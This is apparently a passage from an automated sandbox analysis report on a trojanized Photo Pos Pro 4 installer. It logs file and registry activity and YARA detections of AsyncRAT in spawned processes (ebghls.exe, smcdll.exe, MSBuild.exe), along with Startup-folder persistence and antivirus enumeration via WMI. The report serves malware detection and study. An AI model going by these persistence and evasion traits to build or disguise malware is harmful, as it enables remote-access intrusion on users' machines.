                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\PhotoPosPro_PreInstaller.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\PhotoPosPro_PreInstaller.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\PhotoPosPro_PreInstaller.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\PhotoPosPro_PreInstaller.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\PhotoPosPro_PreInstaller.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\PhotoPosPro_PreInstaller.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\PhotoPosPro_PreInstaller.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\PhotoPosPro_PreInstaller.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\PhotoPosPro_PreInstaller.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\PhotoPosPro_PreInstaller.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\PhotoPosPro_PreInstaller.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\PhotoPosPro_PreInstaller.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\PhotoPosPro_PreInstaller.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\PhotoPosPro_PreInstaller.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\PhotoPosPro_PreInstaller.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\PhotoPosPro_PreInstaller.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\PhotoPosPro_PreInstaller.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\PhotoPosPro_PreInstaller.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\PhotoPosPro_PreInstaller.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\PhotoPosPro_PreInstaller.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\PhotoPosPro_PreInstaller.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\PhotoPosPro_PreInstaller.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\PhotoPosPro_PreInstaller.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\PhotoPosPro_PreInstaller.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\PhotoPosPro_PreInstaller.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\PhotoPosPro_PreInstaller.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\PhotoPosPro_PreInstaller.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\PhotoPosPro_PreInstaller.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\PhotoPosPro_PreInstaller.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\PhotoPosPro_PreInstaller.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\PhotoPosPro_PreInstaller.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\PhotoPosPro_PreInstaller.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\PhotoPosPro_PreInstaller.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\PhotoPosPro_PreInstaller.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\PhotoPosPro_PreInstaller.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\PhotoPosPro_PreInstaller.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\PhotoPosPro_PreInstaller.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\PhotoPosPro_PreInstaller.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\PhotoPosPro_PreInstaller.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\PhotoPosPro_PreInstaller.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\PhotoPosPro_PreInstaller.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\PhotoPosPro_PreInstaller.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\PhotoPosPro_PreInstaller.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\PhotoPosPro_PreInstaller.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\PhotoPosPro_PreInstaller.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\PhotoPosPro_PreInstaller.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\PhotoPosPro_PreInstaller.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\PhotoPosPro_PreInstaller.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\PhotoPosPro_PreInstaller.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\PhotoPosPro_PreInstaller.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\PhotoPosPro_PreInstaller.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\PhotoPosPro_PreInstaller.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\PhotoPosPro_PreInstaller.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\PhotoPosPro_PreInstaller.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\PhotoPosPro_PreInstaller.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\PhotoPosPro_PreInstaller.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\PhotoPosPro_PreInstaller.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\PhotoPosPro_PreInstaller.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\PhotoPosPro_PreInstaller.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\PhotoPosPro_PreInstaller.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\PhotoPosPro_PreInstaller.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\PhotoPosPro_PreInstaller.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\PhotoPosPro_PreInstaller.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\PhotoPosPro_PreInstaller.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\PhotoPosPro_PreInstaller.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\PhotoPosPro_PreInstaller.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\PhotoPosPro_PreInstaller.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\PhotoPosPro_PreInstaller.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\PhotoPosPro_PreInstaller.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\PhotoPosPro_PreInstaller.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\PhotoPosPro_PreInstaller.exeQueries volume information: C:\Windows\Fonts\DUBAI-MEDIUM.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\PhotoPosPro_PreInstaller.exeQueries volume information: C:\Windows\Fonts\DUBAI-LIGHT.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\PhotoPosPro_PreInstaller.exeQueries volume information: C:\Windows\Fonts\DUBAI-BOLD.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\PhotoPosPro_PreInstaller.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\PhotoPosPro_PreInstaller.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\PhotoPosPro_PreInstaller.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\PhotoPosPro_PreInstaller.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\PhotoPosPro_PreInstaller.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\PhotoPosPro_PreInstaller.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\PhotoPosPro_PreInstaller.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\PhotoPosPro_PreInstaller.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\PhotoPosPro_PreInstaller.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\PhotoPosPro_PreInstaller.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\PhotoPosPro_PreInstaller.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\PhotoPosPro_PreInstaller.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\PhotoPosPro_PreInstaller.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\PhotoPosPro_PreInstaller.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\PhotoPosPro_PreInstaller.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\PhotoPosPro_PreInstaller.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\PhotoPosPro_PreInstaller.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\PhotoPosPro_PreInstaller.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\PhotoPosPro_PreInstaller.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\PhotoPosPro_PreInstaller.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\PhotoPosPro_PreInstaller.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\PhotoPosPro_PreInstaller.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\PhotoPosPro_PreInstaller.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\PhotoPosPro_PreInstaller.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\PhotoPosPro_PreInstaller.exeQueries volume information: C:\Windows\Fonts\flat_officeFontsPreview.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\PhotoPosPro_PreInstaller.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LS.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LS.exe VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LS.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe VolumeInformation
                  Source: C:\Program Files\Photo Pos Pro 4\Photo Pos Pro 4.exeQueries volume information: C:\Program Files\Photo Pos Pro 4\Photo Pos Pro 4.exe VolumeInformation
                  Source: C:\Program Files\Photo Pos Pro 4\Photo Pos Pro 4.exeQueries volume information: C:\Program Files\Photo Pos Pro 4\Photo Pos Pro.dll VolumeInformation
                  Source: C:\Program Files\Photo Pos Pro 4\Photo Pos Pro 4.exeQueries volume information: C:\Program Files\Photo Pos Pro 4\ShellBrowser.dll VolumeInformation
                  Source: C:\Program Files\Photo Pos Pro 4\Photo Pos Pro 4.exeQueries volume information: C:\Program Files\Photo Pos Pro 4\Microsoft.VisualBasic.PowerPacks.Vs.dll VolumeInformation
                  Source: C:\Program Files\Photo Pos Pro 4\Photo Pos Pro 4.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
                  Source: C:\Program Files\Photo Pos Pro 4\Photo Pos Pro 4.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\ebghls.exeQueries volume information: C:\Users\user\AppData\Local\Temp\ebghls.exe VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\ebghls.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LS.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LS.exe VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LS.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\smcdll.exeQueries volume information: C:\Users\user\AppData\Local\smcdll.exe VolumeInformation
                  Source: C:\Users\user\AppData\Local\smcdll.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe VolumeInformation
                  Source: C:\Users\user\Desktop\PhotoPosPro4_SetUp.exeCode function: 0_2_00359930 CreateNamedPipeW,CreateFileW,0_2_00359930
                  Source: C:\Users\user\Desktop\PhotoPosPro4_SetUp.exeCode function: 0_2_0030E370 GetLocalTime,CreateFileW,GetLastError,OutputDebugStringW,OutputDebugStringW,SetFilePointer,WriteFile,FlushFileBuffers,WriteFile,FlushFileBuffers,WriteFile,FlushFileBuffers,WriteFile,FlushFileBuffers,0_2_0030E370
                  Source: C:\Users\user\Desktop\PhotoPosPro4_SetUp.exeCode function: 0_2_003582B0 GetUserNameW,GetLastError,GetUserNameW,GetEnvironmentVariableW,GetEnvironmentVariableW,RegDeleteValueW,RegCloseKey,RegQueryInfoKeyW,RegCloseKey,RegCloseKey,RegDeleteKeyW,RegCloseKey,RegDeleteValueW,RegCloseKey,0_2_003582B0
                  Source: C:\Windows\Installer\MSID82B.tmpCode function: 8_2_00007FF71B791A4C _get_daylight,_get_daylight,_get_daylight,GetTimeZoneInformation,8_2_00007FF71B791A4C
                  Source: C:\Users\user\Desktop\PhotoPosPro4_SetUp.exeCode function: 0_2_001B7A00 GetVersionExW,GetVersionExW,IsProcessorFeaturePresent,0_2_001B7A00
                  Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                  Lowering of HIPS / PFW / Operating System Security Settings

                  barindex
                  Yara detected AsyncRAT
                  Source: Yara matchFile source: 41.2.MSBuild.exe.800000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 40.2.smcdll.exe.2c73d54.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 33.2.ebghls.exe.353b338.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 40.2.smcdll.exe.2c73d54.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 33.2.ebghls.exe.353b338.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000025.00000002.2982455411.0000000002911000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000021.00000002.2602950947.0000000003411000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000021.00000002.2602950947.00000000035C8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000029.00000002.2632261020.0000000000802000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000028.00000002.2600796732.0000000002CB3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000028.00000002.2600796732.0000000002B51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: ebghls.exe PID: 7312, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 5628, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: smcdll.exe PID: 5328, type: MEMORYSTR
                  Source: RegAsm.exe, 0000001D.00000002.2965578941.0000000000B91000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000024.00000002.2702150034.00000000009F9000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000024.00000002.2849359581.00000000053FC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000024.00000002.2849359581.00000000053F3000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000025.00000002.3053643822.0000000004FA0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\PhotoPosPro_PreInstaller.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\PhotoPosPro_PreInstaller.exeRegistry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\PhotoPosPro_PreInstaller.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_AJAX_CONNECTIONEVENTS
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\PhotoPosPro_PreInstaller.exeRegistry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_AJAX_CONNECTIONEVENTS
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\PhotoPosPro_PreInstaller.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ENABLE_CLIPCHILDREN_OPTIMIZATION
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\PhotoPosPro_PreInstaller.exeRegistry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ENABLE_CLIPCHILDREN_OPTIMIZATION
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\PhotoPosPro_PreInstaller.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_MANAGE_SCRIPT_CIRCULAR_REFS
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\PhotoPosPro_PreInstaller.exeRegistry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_MANAGE_SCRIPT_CIRCULAR_REFS
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\PhotoPosPro_PreInstaller.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_DOMSTORAGE
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\PhotoPosPro_PreInstaller.exeRegistry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_DOMSTORAGE
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\PhotoPosPro_PreInstaller.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_GPU_RENDERING
